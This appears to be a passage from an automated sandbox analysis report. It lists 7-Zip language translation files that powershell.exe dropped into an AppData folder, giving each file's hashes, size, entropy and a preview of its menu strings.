                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Vinayy Sharrma, ....... .... ..... ......... .... ...., .. ...... ! .. .........! .... ...... ....... .......;..;..;..;..;..;..;..;..;..;..0..7-Zip..Sanskrit, Indian, .......................401..... ...................&.....&....&... ..............&.... .....440..&....... .....&....... .............. .... ......&............&........(.........)..&......................... .... .... ..... ... ....... .... ..... ....?..500..&........&..........&.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\si.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16972
                                                                                                                                                          Entropy (8bit):4.2388610920003975
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iIOc5iNEOdZPFVIz36hkSuWjJyzB8X/qCwd5WvZNkad73+ivI/MpngGhNJDkGx/p:2XNnZ9/u59CC5WHt9I/rGhPRx9+7SuJc
                                                                                                                                                          MD5:2B78E18BCB07CB8D59D8682502576F8E
                                                                                                                                                          SHA1:C277B543EE18441681CDAFF9EFEAD09963BF9604
                                                                                                                                                          SHA-256:3899EDD17A78BC729278304F7B0AE7750C422A5BA684AAC9EDC15B8527A229DA
                                                                                                                                                          SHA-512:DA07AF56BBD954828623C7B38FD3E6CDFE89DF98F2525AA486A43FDD17EA5CE79F90E691B1F459DF5238B04B3FFF0FED58559BC93E15559FF6D8D2A2CF4DA172
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : ...... ....... (Supun Budhajeewa)..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Sinhala.........401..................... (&Y)...... (&N)....... (&C).............. ...... (&C)..440.......... ... (&A).......... ....(&L)....................... ................ (&B)........... (&F)...... ...... (&P)...... .... ............ ...... .. ....... . ?..500....... (&F)......... (&E)...... (&V)........ (&A)........ (&T)...... (&H)..540....... ..... (&O)....... ..... ..... (&I)......... ..... ..... (&U)......

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\sk.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9372
                                                                                                                                                          Entropy (8bit):5.379400863038617
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ihqYyHuLGHP372c79qAFklXva+hF+zmTzeNMR:iMjUGHP72cJqAFAXi+hs0aNMR
                                                                                                                                                          MD5:CA2B22D21945A478757A099EEAFDF9A9
                                                                                                                                                          SHA1:5EFBF215647E82DDEAA4C83D064EF83B51413DEA
                                                                                                                                                          SHA-256:E571C0D87B50F4659099B4CA618057533C22578066E411C5CEB3DF8BE1E77CFF
                                                                                                                                                          SHA-512:40365AC6CDD70FF7B7AB09482E1E9263B1B131772019EDA357007D029A879111DA72B05756ADBFC3206B1C060211A16B5F10D507FB0CAA3696907C8433FE9537
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Tomas Tomasek..; 9.07 : Pavel Deve.ka..; 9.38 beta : 2015-01-11 : Roman Horv.th..;..;..;..;..;..;..;..;..0..7-Zip..Slovak..Sloven.ina..401..OK..Zru.i.........&.no..&Nie..&Zavrie...Pomocn.k....Po&kra.ova...440...no na &v.etko..Nie na v.&etko..Zastavi...Re.tartova...&Pozadie..P&opredie..Po&zastavi...Pozastaven...Ste si ist., .e chcete akciu zru.i.?..500..&S.bor..&Upravi...&Zobrazi...&Ob..ben...&N.stroje..&Pomocn.k..540..&Otvori...O&tvori. vn.tri..Ot&vori. externe..&Zobrazi...&Upravi...&Premenova...&Kop.rova. do.....P&resun.. do.....O&dstr.ni...Ro&zdeli. s.bor.....Zl..&i. s.bory.....V&lastnosti..Ko&ment.r..Vypo..ta. kontroln. s..et..Rozdiel (Diff)..Vytvori. prie.inok..Vytvori. s.bor..Uko&n.i...Odkaz.....600..Ozna.i. v.etko..Odzna.i. v.etko..Invertova. ozna.enie..Ozna.i......Odzna.i......Ozna.i. pod.a typu..Odzna.i. pod.a typu..700..&Ve.k. ikony..&Mal. ikony..&Zoznam..&Podrob

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\sl.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8586
                                                                                                                                                          Entropy (8bit):5.014328026612101
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iGCcUhGAoKfrxHa5Qn6dq5OSsZf1G1huHF8fY1oTraGAF7S+pVss0Bu2mXXF6OG:iJhFoKlZZoZ9Gi52rChEmXAOG
                                                                                                                                                          MD5:7004B98D09316E84156B91C54888C9D4
                                                                                                                                                          SHA1:39C8681E497DDE4CCFFA3BF8D15B53627757ECE8
                                                                                                                                                          SHA-256:548AA8422A228617B30FBD448D03C38C3A11D010051A24544CF8AE479314ACD8
                                                                                                                                                          SHA-512:C48F4BACED7A4FAF958712225A5326CA2225DD7B396164787AD2C83A0314774E9126FA510EBA37B1AB2FF26C67A7AAAA0BA9129B0D97A119AD1D726A56A33066
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : tomazek..; 4.55 : miles..;..; 21.00 : 2021-01-19 : Jadran Rudec..;..;..;..;..;..;..;..0..7-Zip..Slovenian..Sloven..ina..401..Vredu..Prekli.i........&Da..&Ne..&Zapri..Po&mo.....&Nadaljuj..440..Da za &vse..Ne za v&se..Ustavi..Znova za.eni..Ozad&je..&Ospredje..Premor..Na premoru..Ali ste prepri.ani, da .elite preklicati?..500..Datoteka..Urejanje..&Prikaz..Priljubljene..Orodja..Pomo...540..&Odpri..Odpri &znotraj..Odpri zu&naj..P&rikaz..&Uredi..Prei&menuj..&Kopiraj.....&Premakni.....Iz&bri.i..&Razdeli datoteko.....&Zdru.i datoteke.....L&astnosti..Ko&mentar..Izra.unaj preizusno vsoto..Razlika..Ustvari mapo..Ustvari datoteko..&Izhod..Povezava..&Nadomestni tokovi..600..Izberi &vse..Razveljavi izbiro vseh..&Preobrni izbor..Izberi.....Razveljavi izbiro.....Izberi po vrsti..Razveljavi izbiro po vrsti..700..&Velike ikone..&Majhne ikone..&Seznam..&Podrobnosti..730..Nerazvr..eno..Ploski prikaz..&Dve podokni..&Orodne vrstice..Odpri korensko mapo..Eno raven

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\sr-spc.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11993
                                                                                                                                                          Entropy (8bit):4.283284821303782
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iCk9ED/u0/rzMXyBMtR/TL0wN1i9Rd9u3ZDxoAF9sOVbvmyz3xnvze0kIqLm3HGX:iCk94zBWv0b9P9gZ1lLhnbe8q0tfsH6o
                                                                                                                                                          MD5:FFD26304B9B5FAE8547703515E84460D
                                                                                                                                                          SHA1:CFF3F023BB47CA3C6C3DB202CD8C126B0BB2F59F
                                                                                                                                                          SHA-256:283DD99EC8D13784B3D79C36766CDB16DAC0EDE0C1C09E8B1EFA64F5DC2C1A55
                                                                                                                                                          SHA-512:0A4E39E2598C73F936E4C8BD56201FEE00AEB5DAAB0D7B735D5137A8B7C15830B40F028C77B528B75653540836098F5E8FC059111DD2EFBD0A46DDBDF97465C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Lazar..; 9.07 : Ozzii..;..;..;..;..;..;..;..;..;..0..7-Zip..Serbian - Cyrillic........ - ..........401... .......................................................440.... .. ....... .. ................................ ...................... .. ... ....... .. ...... .. .........?..500.......................................................540.................. .. 7-Zip-.......... .. ........... ................................................. .............. .................... ............. .......................................... ........ ....................... .............. .................60

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\sr-spl.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7169
                                                                                                                                                          Entropy (8bit):5.029859884824853
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iZjnEAuD8cvkp9HRmD+eyl3NLH0qgGOzeVTs8rmXab4f:i5EL8cIxMQGGjuXasf
                                                                                                                                                          MD5:FD327F424C7E4F23D2C018DED334A1B5
                                                                                                                                                          SHA1:0FE9A48C528BE4022B19F7373CBA9190D3BDB473
                                                                                                                                                          SHA-256:D5A250B45BD51267E2B0D78CF60E7F14113419565F9B95C2B1113963396570A5
                                                                                                                                                          SHA-512:AE6C2959A5348BDBC1464FD0E08A3A00F8598A2D423381E5883347A85E88F7749659E0FAC4F89D6CCBC74A1E83F47EC4F42CAC22115CA3921DEF00DE41978ADB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Lazar..; 9.07 : Ozzii..;..;..;..;..;..;..;..;..;..0..7-Zip..Serbian - Latin..Srpski - latinica..401..U redu..Otka.i........Da..Ne..Zatvori..Pomo.....Nastavi..440..Da za sve..Ne za sve..Stani..Ponovo..Pozadina..Na vrhu..Pauza..Pauza..Da li ste sigurni da .elite da prekinete?..500..Datoteka..Ure.ivanje..Pregled..Omiljeno..Alati..Pomo...540..Pogledaj..Otvori sa 7-Zip-om..Otvori sa pridru.enom programom..Pregledaj..Promeni..Preimenuj..Kopiraj u.....Premesti u.....Obri.i..Podeli fajl.....Spoj delove.....Svojstva..Komentar..Izra.unajte provernu veli.inu..razlika..Nova fascikla..Nova datoteka..Izlaz..600..Izaberi sve..Poni.ti izbor svega..Obrnuti izbor..Izaberi.....Poni.ti izbor.....Izaberi po tipu..Poni.ti izbor po tipu..700..Ikone..Naporedno slaganje..Spisak..Detalji..730..Bez sortiranja..Ravan pregled..2 Prozora..Trake sa alatkama..Otvori po.etnu fasciklu..Gore za jedan nivo..Hronologija.....Osve.avanje..750..Rad sa arhivama..Rad sa datotekama.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\sv.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8924
                                                                                                                                                          Entropy (8bit):5.0752452779778086
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iIRthqlCnYhI0sbVA28ta0obRFz+3uCFQ9/FLFDLb0Y620X9CWHdfSzuQ3lBMjiC:iIzhdnY+bi2tWIFLJb0Y62dWHuTlC
                                                                                                                                                          MD5:2EC8B6F0C0C05157AE90ABA540DEBED1
                                                                                                                                                          SHA1:56DE30674CF6ED17AE1FD42080214573B8383789
                                                                                                                                                          SHA-256:54112B265EC01759ADBF72DC856FF0F9DBB2B3029EFF8A56DE08DFFC5D3DC954
                                                                                                                                                          SHA-512:6CB83B0D3DB5254E47F86100C38BE073F257B4F2E643F14E91DF9CCAC36A631BF06E52CE8F98106F5A17CF19745F2B6277605968BFEB9E0D423B1FD3AB5C0A06
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Andreas M Nilsson, Christoffer Enqvist..; 4.59 : Bernhard Eriksson..; 15.00 : 2021-11-17 : Mikael Hiort af Orn.s..;..;..;..;..;..;..;..;..0..7-Zip..Swedish..Svenska..401..OK..Avbryt........&Ja..&Nej..&St.ng..Hj.lp....F&orts.tt..440..Ja till &alla..Nej till a&lla..Stoppa..Starta om..&Bakgrunden..&F.rgrunden..&Pausa..Pausad...r du s.ker p. att du vill avbryta?..500..&Arkiv..&Redigera..&Visa..&Favoriter..Verkt&yg..&Hj.lp..540..&.ppna...ppna &internt...ppna &externt..&Visa..&Redigera..&Byt namn..&Kopiera till.....&Flytta till.....&Ta bort..&Dela upp fil.....&Sammanfoga filer.....E&genskaper..Komme&ntera..Ber.kna kontrollsumma..Differens..Skapa mapp..Skapa fil..&Avsluta..Skapa l.nk..&Alternativa datastr.mmar..600..Markera &alla..Avmarkera alla..&Invertera markering..Markera.....Avmarkera.....Markera efter typ..Avmarkera efter typ..700..St&ora ikoner..Sm&. ikoner..&Lista..&Detaljerad lista..730..Osorterad..Platt vy..&Tv. paneler..&Verktygsf.l

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\sw.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8562
                                                                                                                                                          Entropy (8bit):4.876402900973041
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7F+9CSE///gXaidWrT8PpH0fKxsyEeHRinn:74Cto9paKxsRn
                                                                                                                                                          MD5:EE27959AEF24CEF2EC07684CF420B2DD
                                                                                                                                                          SHA1:07D9B4D2B4AB10B3341F3286CEE73185DAAAD918
                                                                                                                                                          SHA-256:AAEB1631458E448B678579CE369FD0A6D66E0FB02B9218328C537EE38636C557
                                                                                                                                                          SHA-512:9E0FD7DB8D799763EEE9980D8C2B0864640FB74A86036D337B019AC317A3541CBA6D65AF1C4179ED46D64D4005395CD6C761F6A234428DF3F1FB04634955242F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 15.00 : 2020-05-15 : Mara Gati Lucky (http://electricity.co.ke)..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Swahili..Kiswahili..401..Sawa..Ghairi........&Ndio..&Hapana..&Funga..Usaidizi....&Endelea..440..Ndio kwa &zote..Hapana kwa z&ote..Simamisha..Washa upya..&Mandharinyuma..&Mandharimbele..&Tuliza..Imetulizwa..Una uhakika unataka kughairi?..500..&Faili..&Hariri..&Mwoneko..Z&inazopendwa..&Zana..&Usaidizi..540..&Fungua..Fungua &ndani..Fungua n&je..&Mwoneko..&Hariri..Pati&a jina upya..&Nakili hadi.....&Sogeza hadi.....&Futa..&Gawiza faili.....Ung&anisha nyaraka.....S&ifa..Toa m&aoni.....Kokotoa checksum..Tofautisha..Unda kabrasha..Unda faili..F&unga..Kiungo..&Mitiririsho mbadala..600..Teua &zote..Ondoa uteuzi wote..&Pindua uteuzi..Teua.....Ondoa uteuzi.....Teua kulingana na aina..Ondoa uteuzi kulingana na aina..700..Iko&ni kubwa..Ikoni ndogo..&Orodha..&Maelezo..730..Haijapangwa..Mwoneko bapa..&2 paneli..&Miambaa zana..Fungua kabrasha shina..Juu kiwango kimoja..Historia

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ta.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12935
                                                                                                                                                          Entropy (8bit):3.7840989858328618
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:igMxAhP2NKfBuRZjaaC1e13/BNhpYY+KEHtiAnCuu1+AuvB1nNh11N:irlNZjagbAn3
                                                                                                                                                          MD5:228CA6D7B8D850853233C4575A7EBF1F
                                                                                                                                                          SHA1:4BC90FCA87925F7D855972F5DC67EF5E9E29B438
                                                                                                                                                          SHA-256:0A3B285566BBEB3F188B3C72BA21CBFC545EA05471EAB706E972C828DA5234E0
                                                                                                                                                          SHA-512:2995D1C2BACC8C0EE757FC47FE9C8AC07F1EE74AE3A70BBBCC66CBCFA13A924855B3F7515D04031434870829BE34F0FB49A35388EAFFACC0E7A33F9A44A02870
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.13 : Ve Elanjelian : ThamiZha! team : www.thamizha.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Tamil.........401............................................................440............... .................. ............................................................... .................. ..................... ...... ..... .................?..500.........................................................540............ ........... ..................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\tg.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15127
                                                                                                                                                          Entropy (8bit):4.407760431254582
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iLcxMil07H3brpQXBwkGE3RypQcG3XlDrpQK3I5D2OleVZZd3K5RATp+O1jR40pE:imK3bMlGE34Q3FBT3eDoZdaOHfllqzDv
                                                                                                                                                          MD5:4A5529986613CDF743B3F7755F8F5CAE
                                                                                                                                                          SHA1:970DFAD147AB3D32E93EEF6BF464BCAC23368E4F
                                                                                                                                                          SHA-256:1CEDD8F699940FECACACBC5DF093BA70FB2099FAF9864376A3D990DA78B8E075
                                                                                                                                                          SHA-512:1F7E8A8A21E8E5FAF546B2F4C621B326A907AFA017DD8221022DF2D19B3E41D10D5157A8713F8D5485601311029F4E25DCB21D0E9B4991B6D26D651B416239C0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.02 : 2020-10-20 : Shamsiddinov Zafar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Tajik..........401........................&......&....&.................&...........440...... ..... &......... ..... &................. ........&........&.. ... .........&............. .............. ....... ......, .. ......... .... ...... .......?..500..&......&........&........&........................&.........540..&............ ..... &............ ..... .................&.............. .......&............ .......&........ .......&.... ................. ..... &..........&..... ....... ...................................... .

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\th.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16219
                                                                                                                                                          Entropy (8bit):4.008729331792855
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ir9n+rMUfsqjeWnShfO1LpBIB9jip10zsPRO2a8fUhe1RBC6sl4wjn/PqIpqINAG:09n+4csqjeWnSh21LpBIB1O10zsPRO2e
                                                                                                                                                          MD5:8EE06A03DC18E5F8BC750CB6A78F6D9C
                                                                                                                                                          SHA1:179C195700DF844216C2CABDC17062CDDBD1D6B3
                                                                                                                                                          SHA-256:01E7B965BD4B722003F74B4E4B30EF6A1BAEA67108816D1B9F8D6ADD39C7FA10
                                                                                                                                                          SHA-512:4C908BA391BAC8BD36BF76B5C3B59DD59EB71F2513BCD04C47CBDE683AD463C0FEAC5D5AADA67730F3F566156C4BEFF09CD7B7D1EB043B988AD7938B9041C4EC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.09 : Chayanon Ruamcharoen..; 4.10 : Zafire06 ..; 9.13 : Kom10..;..;..;..;..;..;..;..;..0..7-Zip..Thai.......401......................&.....&.....&..................&..............440........................................&...................&...................&.....................................................500..&......&.......&........&............&............&...........540..&..............................................&........&.......&.......

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\tk.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9236
                                                                                                                                                          Entropy (8bit):5.262770526013847
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7toKrLbypqg+g8p0k9DMfjrdTU4dX81abJjrkLPFT8jPJzVIj7dYqxMXXDqit:7mKr2qL3oRUU81oBmPFwb9VY7dYqxMmm
                                                                                                                                                          MD5:75C23D0431BC83CA17308F08D1173C1D
                                                                                                                                                          SHA1:A052E61036E0DA973253BA225031D5929EE5E2D5
                                                                                                                                                          SHA-256:75EFF9DE596459F3EBA755B5C4C8CE635AF2CECDBAE40749DF348C97A2E56EE0
                                                                                                                                                          SHA-512:10872E31DF08E59D080BE3C0B975DF06E2E8BCECEA14FCF9F547965143A9652C8B9ED50D38232A72B8F0745C964F4E616B06368D9983F35BA05FBCBF2294900B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 19.00 : 2019-03-04 : Merdan NURIYEV Hazar-Balkan H.K...;..;..;..;..;..;..;..;..;..;..0..7-Zip..Turkmen..T.rkmen.e..401..Howwa..Go.bolsun et........&Howwa..&.ok...a&p..K.mek al....&Dowam et..440..Hemmesine howw&a..Hemmesine &.ok..Dur..Ga.tadan ba.la..&G.r.nme..&..e .yksyn..&S.gindir..S.gindi..Go.bolsun etjekmi?..500..&Dos.a..&D.zelt..&G.r..F&aworitler..G&urallar..&K.mek..540..&A...&I.inde A...Da.&ynda A...&G.r..&D.zelt..Adyn&y ..tget...u .ere &kop.ala......u .ere &g...r.....&...r..Fa.ly &b.l.....Fa.llary &birle.dir.....&D.zg.nlemeler..Tes&wir.....Barlag jemini hasapla..Tapawutlanma ..Bukja d.ret..Fa.l d.ret..&.yk..Bag ..Akymlary .&aly...600..Hemmesini Se...Hemmesini Se.me..Se.im&i tersine .w.r ..Se......Se.me.....Tiplerine g.r. se...Tiplerine g.ra se.me..700..U&ly Ikon..Ki.i Ikon..Tablissa..Jikme-jikleri..730..Sortlanmadyk..D.z G.rn....&2 Paneller..&Esbaplar..D..p Bukjany A...Bir Tekje .okary..

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\tr.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9799
                                                                                                                                                          Entropy (8bit):5.273356189152464
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:irkBYXKvLRGGtGcunN8uRvXWt2GSdRHI2Je4Sv6J57kLbLaK/FwacCz:irkBgg3GJ8uhXWtfGRH5o9D
                                                                                                                                                          MD5:C69BE29E4448A858180DAF367464D531
                                                                                                                                                          SHA1:D83819911331F73BC35E2EB02EC1FBCDDDF30B7D
                                                                                                                                                          SHA-256:4816929C4BB958CE8D64D14DF47F0B6A35DCF0E7EB88201EAA93AF541894E354
                                                                                                                                                          SHA-512:469BE1075E9A5C4CC8BB6A0B55E645448EDA3D46527A5561CD55807F5E52C3410904A34E0E64E11F963153D5CEA5CCF16E7E7FC7ED63AEA3FBE532959056AA77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2018-11-21 : Kaya Zeren..; 9.07 : 2009-09-22 : X-FoRcE ..;..;..;..;..;..;..;..;..;..0..7-Zip..Turkish..T.rk.e..401..Tamam...ptal........&Evet..&Hay.r..&Kapat..Yard.m....&Devam..440..T.m.ne E&vet..T.m.ne Ha&y.r..Durdur..Yeniden Ba.lat..&Arka Planda...&n Planda..&Duraklat..Duraklat.lm.....ptal etmek istedi.inize emin misiniz?..500..&Dosya..D.z&enle..&G.r.n.m..&S.k Kullan.lanlar..&Ara.lar..&Yard.m..540..&A...7-Zip ..i&nde A...&Varsay.lan Uygulamada A...&G.r.nt.leyici..D.z&enle..&Yeniden Adland.r..Klas.re Ko&pyala.....Klas.re &Ta.......&Sil..Dosyay. &B.l.....Dosyalar. Bi&rle.tir......&zellikler..A..kla&ma......Sa.lamalar. Hesapla..Fark..Klas.r &Olu.tur..Dosya Ol&u.tur....&k..Ba&.lant...Ak..&lar. De.i.tir..600..T.m.n. &Se...T.m.n. B.rak..Se.imi &Tersine .evir..Se......T.m.n. B.rak.....Ayn. T.rdekileri Se...Ayn. T.rdekileri B.rak..700..B.y.k Sim&geler..K...k Si&mgeler..&Liste

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\tt.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14202
                                                                                                                                                          Entropy (8bit):4.5738343406459805
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:idiangc64QGQ6p6Wc84DqdqQdP9YW0XyU9ondS8O20Biu9J5:rag/4Tzp6Wc84Dq0QdP9YiUGnmiu9T
                                                                                                                                                          MD5:6E299B81EDACF15FACE1271D032CC5A0
                                                                                                                                                          SHA1:F2E955FD7BBF9140F0E86BF1A759D729C9A4E4DA
                                                                                                                                                          SHA-256:18479D66E0C8B5144EA32CC9D6B58EB8748E80D2C3BDEC0DBD99BBC3AB42495D
                                                                                                                                                          SHA-512:84E9484319DEB5A7049FE130290A7D67A8FAEFC9A17F7B2CE9F9586FB0F0641B839BAE681C6F8FFEF551780F56166C9886C1F7F6F0DF386389F44710423B9865
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.10 : 2017-02-12 : Bulat Ibrahim..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Tatar...........401..OK..... .............&.....&....&.................&..... ........440..... &........ ........ .&....... ....................&.......&.... ........&...................... .. ....... ............?..500..&......&.........&.......&...........&.........&.........540..&............ &............. ..&.............&.................. &............&.................&..............&................. &..................... &....................&..............&............... .....................&..... ..........&.. .........&

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ug.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11386
                                                                                                                                                          Entropy (8bit):4.7182582221463525
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iDIm9xflePh286zK/bnZ6U4EeBVDeZTyUZirOCsiCjcY8VFDZ:iNMPhhrBNeBVSTTZUwiCuDZ
                                                                                                                                                          MD5:EF3E8D61D03E42A3B40D6F0B12535ADB
                                                                                                                                                          SHA1:569360BCFEB39C102A3DD78ED96204B5D733FFBE
                                                                                                                                                          SHA-256:9D0268D1EEB8DFDEBBB8EA1033C2B99CD667A244C9859085BE5D54C9E5CED369
                                                                                                                                                          SHA-512:6E9AFEB0A96DA6D8BF63F06DE421B8D4DDBF4D750E1BDF861FBBDC0268CBEB19068D08787F0F1655B40EBDC603D888251DAE188C3547F32B970C7F927754066A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : Sahran..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Uyghur............401............. ...........(&Y).........(&N).....(&C).......................(&C)..440......... ....(&A)......... ...(&L).............. ............ ....(&B)....... ....(&F).......... .....(&P).......... .................... ... ...........500........(&F)........(&E).........(&V)........(&A).......(&T)........(&H)..540.....(&O)........... ........ ...(&I)...... ........ ...(&U).........(&V)........(&E)..... .......(&M)......... .....(&C)......... .....(&M)........(&D)........ .......(&S)......... .........(&B).........(&R).........(&N)........ .............

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\uk.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15180
                                                                                                                                                          Entropy (8bit):4.398927977240258
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iv+2HgJiSSXX7VPkqM6Ix68c65gLKPENwboGxX7xFxexNbK7ExOiyq:LqRRr87Rq
                                                                                                                                                          MD5:D125EF7F9A009CFE4093152E48055AC1
                                                                                                                                                          SHA1:7063F242690890C98296314884E0E6D058C23AFF
                                                                                                                                                          SHA-256:53235CB228DBBB5207F18BD0B318F54FDA9F9F5B05094EA6AC7AE368216CC4EF
                                                                                                                                                          SHA-512:CC199E839E2CF24ABCD8B9685702732427295858976A038FDDF6E3691FD1A31BCAF9F1DBAC48E125E096D1A395DCABFB4ECBB02A6C5E7D6DEA67E44E21E69037
